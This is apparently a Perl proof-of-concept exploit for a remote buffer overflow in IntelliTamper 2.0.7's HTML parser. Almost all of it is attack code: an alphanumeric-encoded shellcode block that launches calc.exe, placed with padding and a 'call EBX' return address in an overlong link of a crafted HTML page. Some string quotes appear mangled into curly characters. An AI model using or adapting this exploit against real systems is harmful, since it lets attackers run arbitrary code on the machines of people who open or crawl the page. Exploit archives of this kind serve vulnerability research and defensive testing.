IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

#!/usr/bin/perl

#

use warnings;

use strict;

# CMD="c:\\windows\\system32\\calc.exe"

# [*] x86/alpha_mixed succeeded, final size 344

my $shellcode =

"\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a" .

"\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\\x58" .

"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42" .

"\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c" .

"\\x4d\\x38\\x47\\x34\\x45\\x50\\x43\\x30\\x43\\x30\\x4c\\x4b\\x51\\x55\\x47" .

"\\x4c\\x4c\\x4b\\x43\\x4c\\x44\\x45\\x42\\x58\\x45\\x51\\x4a\\x4f\\x4c\\x4b" .

"\\x50\\x4f\\x45\\x48\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x45\\x51\\x4a\\x4b\\x50" .

"\\x49\\x4c\\x4b\\x47\\x44\\x4c\\x4b\\x45\\x51\\x4a\\x4e\\x46\\x51\\x49\\x50" .

"\\x4d\\x49\\x4e\\x4c\\x4b\\x34\\x49\\x50\\x43\\x44\\x43\\x37\\x49\\x51\\x49" .

"\\x5a\\x44\\x4d\\x45\\x51\\x49\\x52\\x4a\\x4b\\x4c\\x34\\x47\\x4b\\x51\\x44" .

"\\x47\\x54\\x45\\x54\\x43\\x45\\x4d\\x35\\x4c\\x4b\\x51\\x4f\\x47\\x54\\x45" .

"\\x51\\x4a\\x4b\\x43\\x56\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f" .

"\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c\\x4b\\x45\\x4c\\x4c\\x4b\\x43\\x31\\x4a" .

"\\x4b\\x4c\\x49\\x51\\x4c\\x51\\x34\\x43\\x34\\x48\\x43\\x51\\x4f\\x50\\x31" .

"\\x4c\\x36\\x45\\x30\\x51\\x46\\x42\\x44\\x4c\\x4b\\x51\\x56\\x46\\x50\\x4c" .

"\\x4b\\x47\\x30\\x44\\x4c\\x4c\\x4b\\x42\\x50\\x45\\x4c\\x4e\\x4d\\x4c\\x4b" .

"\\x45\\x38\\x43\\x38\\x4b\\x39\\x4c\\x38\\x4c\\x43\\x49\\x50\\x43\\x5a\\x50" .

"\\x50\\x43\\x58\\x4a\\x50\\x4d\\x5a\\x45\\x54\\x51\\x4f\\x42\\x48\\x4c\\x58" .

"\\x4b\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4a\\x47\\x42\\x43\\x46" .

"\\x5a\\x51\\x4c\\x42\\x57\\x42\\x49\\x42\\x4e\\x42\\x44\\x42\\x4f\\x42\\x57" .

"\\x43\\x43\\x51\\x4c\\x43\\x43\\x44\\x39\\x43\\x43\\x43\\x44\\x43\\x55\\x42" .

"\\x4d\\x47\\x43\\x50\\x32\\x51\\x4c\\x43\\x53\\x45\\x31\\x42\\x4c\\x42\\x43" .

"\\x46\\x4e\\x45\\x35\\x44\\x38\\x42\\x45\\x43\\x30\\x45\\x5a\\x41\\x41";

my $evil_html = \'<html><head><title>ph33r</title></head><body>\’ .

#\'<a href="http://AAAAAAAAAA\’ .

#"\\x41" x 450 .

\'<a href="http://\’ .

$shellcode .

"\\x41" x 116 .

"\\x39\\x5c\\x3d\\x7e" . # ascii friendly \’call EBX\’

\’.htm">ph33r</a>\’ .

"</body></html>";

print $evil_html;